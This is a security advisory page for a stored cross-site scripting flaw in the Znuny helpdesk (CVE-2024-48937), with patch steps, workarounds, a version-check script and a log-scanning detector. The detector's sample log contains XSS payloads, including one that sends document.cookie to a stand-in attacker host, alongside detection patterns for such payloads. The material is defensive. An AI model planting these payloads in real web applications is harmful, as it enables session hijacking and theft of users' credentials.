CVE-2024-48937

6.1 MEDIUM

📋 TL;DR

This stored cross-site scripting (XSS) vulnerability in Znuny lets an attacker who can edit the SLA settings of an Activity Dialogue save JavaScript in the short description field. The value is not encoded on output, so the script executes in the browser of any administrator or agent who later opens that dialogue, with that user's Znuny session. Affected releases are Znuny LTS 6.5.1 through 6.5.10 and Znuny 7.0.1 through 7.0.16; the fix shipped in 6.5.11 and 7.0.17.

💻 Affected Systems

Products:
  • Znuny
Versions: LTS 6.5.1 through 6.5.10 and 7.0.1 through 7.0.16
Operating Systems: All platforms running Znuny
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerable rendering is part of the standard installation; no optional package is involved. Exploitation needs an account that is allowed to edit the SLA settings of an Activity Dialogue, and a victim who opens that dialogue afterwards.

📦 What is this software?

Znuny is an open-source helpdesk and ticketing system written in Perl, maintained as a fork of ((OTRS)) Community Edition. Activity Dialogues are the forms of its process-management feature; SLA is one of the ticket fields such a dialogue can expose, and each field carries a configurable short description.

⚠️ Risk & Real-World Impact

🔴 Worst Case

The injected script runs with the victim's Znuny session. An attacker could read the session cookie where the browser lets script access it, or simply drive the Znuny interface from the victim's browser, which works regardless of cookie flags. With an administrator as the victim that means configuration changes or new accounts made in the administrator's name, which is tantamount to compromising the instance. Redirecting users to attacker-controlled sites is also possible.

🟠 Likely Case

An attacker who already holds (or has phished) an account with rights to edit Activity Dialogue SLA settings stores a script that fires whenever an administrator or agent opens that dialogue, leading to session hijacking or unauthorized actions performed as that user. Because the payload lives in the stored configuration, it keeps firing for every viewer until it is removed.

🟢 If Mitigated

On a patched version the short description is HTML-encoded on output, so a stored payload is shown as literal text rather than executed. Restricting who may edit Activity Dialogues shrinks the set of possible attackers but does not remove the bug.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires an authenticated account with rights to modify the SLA settings of an Activity Dialogue, so an outsider first needs such an account. Beyond that there is nothing subtle: the field is rendered without output encoding, and an ordinary HTML/JavaScript payload stored in it executes in the browser of whoever opens the dialogue.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: LTS 6.5.11 and 7.0.17

Vendor Advisory: https://www.znuny.org/en/advisories/zsa-2024-05

Restart Required: Yes

Instructions:

1. Back up the Znuny installation directory and the database.
2. Download the patched release (6.5.11 for the LTS line, 7.0.17 for 7.0) from the official Znuny website.
3. Follow the Znuny update documentation for your version, including the configuration rebuild and cache clean-up it prescribes for patch-level updates.
4. Restart the Znuny daemon and the web server once the update has completed.

🔧 Temporary Workarounds

Input Validation Filter (all platforms)

Reject or strip HTML and script constructs server-side when the SLA short description of an Activity Dialogue is saved. There is no configuration switch for this; it needs a change to Znuny's own code, so it amounts to a hand-written backport and should only be a stopgap until the upgrade.

Output Encoding (all platforms)

HTML-encode the SLA short description wherever it is inserted into a page in Activity Dialogues. Encoding on output is the correct layer for this defence, since an encoded value cannot execute no matter what was stored, but like the filter above it means editing Znuny's templates or modules, so upgrading is preferable.

🧯 If You Can't Patch

  • Restrict the right to edit Activity Dialogues (process management) to the few administrators who need it, and review the existing dialogue configurations for HTML or script in the SLA short description in case a payload was stored before the restriction
  • Add web application firewall (WAF) rules for the process-management and SLA admin endpoints that block HTML tags, event-handler attributes and javascript: URLs in request parameters; the rules must inspect and decode POST bodies, because the configuration is submitted as form data, not in the URL

🔍 How to Verify

Check if Vulnerable:

You are affected if the installed version is in LTS 6.5.1 through 6.5.10 or 7.0.1 through 7.0.16 and the instance has not been patched by other means.

Check Version:

The version is shown in the Admin interface and is recorded in the RELEASE file in the Znuny home directory (a line of the form VERSION = 6.5.10). Installations from the vendor's RPM packages also report it through the package manager.

Verify Fix Applied:

After upgrading, confirm the version reads 6.5.11 or later on the LTS line, or 7.0.17 or later on 7.0. Then, on a test instance or outside business hours, save a benign marker such as <u>znuny-probe</u> in the SLA short description of a test Activity Dialogue and open the dialogue: a fixed version shows the literal text including the angle brackets, a vulnerable one renders it as underlined text. Remove the marker afterwards.
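The two checks above as a script, added here as a worked example; this is not Znuny's own tooling. It parses the RELEASE file that Znuny keeps in its home directory, applies the affected ranges listed on this page, and classifies a saved copy of the rendered dialogue HTML by whether the probe marker came back encoded. The KEY = VALUE layout of RELEASE (including the VERSION line) is the OTRS/Znuny convention; the RELEASE text and HTML fragments in the script are constructed for the example.

```python
"""Added example, not part of Znuny: version-range check for CVE-2024-48937
and a check that a saved XSS probe was rendered as text, not markup."""
import html
import re

# Affected ranges exactly as stated on this page: branch -> (first, last) affected patch level.
AFFECTED = {"6.5": (1, 10), "7.0": (1, 16)}
FIXED_PATCH = {"6.5": 11, "7.0": 17}

# Benign marker: underlined text on a vulnerable instance, literal <u>...</u> on a fixed one.
PROBE = "<u>znuny-probe</u>"


def parse_release(text: str) -> dict:
    """Parse 'KEY = VALUE' lines such as those in Znuny's RELEASE file."""
    release = {}
    for line in text.splitlines():
        match = re.match(r"^\s*(\w+)\s*=\s*(.+?)\s*$", line)
        if match:
            release[match.group(1).upper()] = match.group(2)
    return release


def vulnerable_version(version: str) -> bool:
    """True if version lies in LTS 6.5.1-6.5.10 or 7.0.1-7.0.16."""
    match = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", version)
    if not match:
        raise ValueError(f"unrecognised Znuny version string: {version!r}")
    major, minor, patch = (int(x) for x in match.groups())
    branch = f"{major}.{minor}"
    if branch not in AFFECTED:
        return False  # no other branch is listed as affected on this page
    low, high = AFFECTED[branch]
    return low <= patch <= high


def version_verdict(release_text: str) -> str:
    """Human-readable verdict for the content of a RELEASE file."""
    release = parse_release(release_text)
    product = release.get("PRODUCT", "unknown product")
    version = release.get("VERSION", "")
    if not version:
        return f"UNKNOWN: no VERSION line found for {product}"
    if vulnerable_version(version):
        branch = ".".join(version.split(".")[:2])
        return f"VULNERABLE: {product} {version}; upgrade to {branch}.{FIXED_PATCH[branch]} or later"
    return f"NOT AFFECTED: {product} {version}"


def classify_render(rendered_html: str, probe: str = PROBE) -> str:
    """Classify how the probe came back in the rendered dialogue HTML.

    UNESCAPED    - the raw probe is present, i.e. the field is still injectable
    ESCAPED      - only the HTML-encoded form is present (expected after the fix)
    NOT_RENDERED - the probe does not appear at all (wrong page or wrong field)
    """
    if probe in rendered_html:
        return "UNESCAPED"
    encoded = {html.escape(probe, quote=False), html.escape(probe, quote=True)}
    if any(form in rendered_html for form in encoded):
        return "ESCAPED"
    return "NOT_RENDERED"


if __name__ == "__main__":
    # Constructed sample inputs for the example.
    for text in ("PRODUCT = Znuny\nVERSION = 6.5.10\n", "PRODUCT = Znuny\nVERSION = 7.0.17\n"):
        print(version_verdict(text))
    vulnerable_page = '<label>Short description:</label> <span><u>znuny-probe</u></span>'
    fixed_page = '<label>Short description:</label> <span>&lt;u&gt;znuny-probe&lt;/u&gt;</span>'
    print(classify_render(vulnerable_page), classify_render(fixed_page))
```

Run it against the RELEASE file of each instance (cat RELEASE | python3 check.py style, or read the file in place) and, after the probe test, against the saved page source of the dialogue; NOT_RENDERED means the probe was saved in a field that the page you captured does not display, so check the field and page before concluding anything.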

📡 Detection & Monitoring

Log Indicators:

  • Changes to Activity Dialogue or SLA configuration outside change windows, or by accounts that do not normally touch process management (the stored configuration records who last changed it)
  • HTML tags, event-handler attributes (onerror=, onload=) or javascript: URLs in the SLA short description of any Activity Dialogue configuration
  • Requests to the process-management or SLA admin modules whose parameters contain such constructs, in encoded or decoded form

Network Indicators:

  • HTTP requests to the admin endpoints for process management or SLAs carrying HTML or script in their parameters; the payload travels in the POST body, so plain access logs will not show it
  • Admin-endpoint traffic from source addresses or at times that are unusual for your administrators

SIEM Query:

web_requests WHERE (url CONTAINS 'AdminProcessManagement' OR url CONTAINS 'AdminSLA' OR url CONTAINS 'ActivityDialog') AND (parameters CONTAINS '<script' OR parameters CONTAINS 'javascript:' OR parameters MATCHES '<[a-z][^>]*[[:space:]]on[a-z]+[[:space:]]*=')

Decode URL encoding and HTML entities in the parameters before matching, or the query also needs the encoded spellings (%3Cscript, &lt;script). Matching '<script>' alone misses the common tag-with-event-handler payloads. Body parameters are only available if the web server or WAF logs POST bodies.
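The query above turned into runnable detection logic over request logs, added here as a worked example rather than anything shipped with Znuny. It scopes to the admin modules (assumed Action names AdminProcessManagement and AdminSLA), decodes each parameter until stable before matching, and flags event-handler and embedding-tag payloads that a bare '<script>' match would miss. The JSON log lines, the /znuny/ path, the Subaction names and the ConfigJSON body parameter are constructed assumptions for the example; in a real deployment the proxy or WAF must log POST bodies for this to see the payload at all.

```python
"""Added example, not part of Znuny: scan request logs for XSS payloads sent
to the Znuny admin endpoints that edit Activity Dialogues or SLAs (CVE-2024-48937)."""
import html
import json
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Assumption: the Znuny admin modules for process management and SLAs use these Action names.
ADMIN_ACTIONS = ("AdminProcessManagement", "AdminSLA")

# Payload shapes worth flagging in a configuration field; far broader than '<script>' alone.
XSS_PATTERNS = [
    ("script tag", re.compile(r"<\s*script", re.I)),
    ("javascript: url", re.compile(r"javascript\s*:", re.I)),
    ("event handler", re.compile(r"<\s*[a-z][^>]*\son[a-z]+\s*=", re.I)),
    ("embedding tag", re.compile(r"<\s*(iframe|object|embed|svg|math)\b", re.I)),
    ("data: html", re.compile(r"data\s*:\s*text/html", re.I)),
]


def normalise(value: str) -> str:
    """Undo URL and HTML-entity encoding until stable so encoded payloads are not missed."""
    current = value
    for _ in range(3):
        decoded = html.unescape(unquote_plus(current))
        if decoded == current:
            break
        current = decoded
    return current


def request_params(entry: dict) -> dict:
    """Merge query-string and logged body parameters. Znuny separates query
    parameters with ';' (Action=...;Subaction=...), hence the replace."""
    query = urlsplit(entry["url"]).query.replace(";", "&")
    params = parse_qs(query, keep_blank_values=True)
    for name, value in entry.get("body", {}).items():
        params.setdefault(name, []).append(value)
    return params


def inspect_entry(entry: dict):
    """Return a finding for one log entry, or None if it is not suspicious."""
    params = request_params(entry)
    action = params.get("Action", [""])[0]
    # Scope to the admin modules only: agent rich-text ticket bodies legitimately contain HTML.
    if not any(action.startswith(name) for name in ADMIN_ACTIONS):
        return None
    hits = {}
    for name, values in params.items():
        for value in values:
            decoded = normalise(value)
            for label, pattern in XSS_PATTERNS:
                if pattern.search(decoded):
                    hits[name] = label
                    break
    if not hits:
        return None
    return {
        "time": entry.get("time"),
        "src_ip": entry.get("src_ip"),
        "user": entry.get("user"),
        "action": action,
        "subaction": params.get("Subaction", [""])[0],
        "params": hits,
    }


def inspect_line(line: str):
    """inspect_entry() for one JSON-encoded log line."""
    return inspect_entry(json.loads(line))


def scan(lines) -> list:
    """Run inspect_line() over JSON log lines and collect the findings."""
    return [f for f in (inspect_line(l) for l in lines if l.strip()) if f]


# Constructed sample log: one JSON object per request, body parameters included
# (assumption: the proxy or WAF logs decoded POST bodies; stock access logs do not).
# Path, Subaction names and the ConfigJSON parameter are assumptions for the example.
SAMPLE_LOG = [json.dumps(e) for e in [
    {"time": "2024-10-14T09:12:01Z", "src_ip": "10.0.0.8", "user": "agent1",
     "url": "/znuny/index.pl?Action=AgentTicketNote;TicketID=42",
     "body": {"Body": "<b>Customer called</b><script>alert(1)</script>"}},
    {"time": "2024-10-14T09:15:30Z", "src_ip": "10.0.0.5", "user": "root@localhost",
     "url": "/znuny/index.pl?Action=AdminProcessManagement;Subaction=ActivityDialogEditAction",
     "body": {"ConfigJSON": "{\"DescriptionShort\":\"SLA for VIP customers\"}"}},
    {"time": "2024-10-14T09:16:02Z", "src_ip": "10.0.0.5", "user": "root@localhost",
     "url": "/znuny/index.pl?Action=AdminProcessManagement;Subaction=ActivityDialogEditAction",
     "body": {"ConfigJSON": "{\"DescriptionShort\":\"SLA %3Cimg src%3Dx onerror%3Dalert(document.cookie)%3E\"}"}},
    {"time": "2024-10-14T09:20:44Z", "src_ip": "203.0.113.7", "user": "contractor",
     "url": "/znuny/index.pl?Action=AdminSLA;Subaction=SLAEditAction",
     "body": {"Comment": "<svg onload=fetch('//evil.example/'+document.cookie)>"}},
]]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(json.dumps(finding))
```

The first sample line shows why the scan is scoped to admin actions: agent notes are rich text and would otherwise flood the output. The third line shows the value of decoding; the URL-encoded image tag contains no literal '<script' or 'javascript:' and only the event-handler pattern catches it.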

🔗 References

  • Znuny advisory ZSA-2024-05: https://www.znuny.org/en/advisories/zsa-2024-05
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2024-48937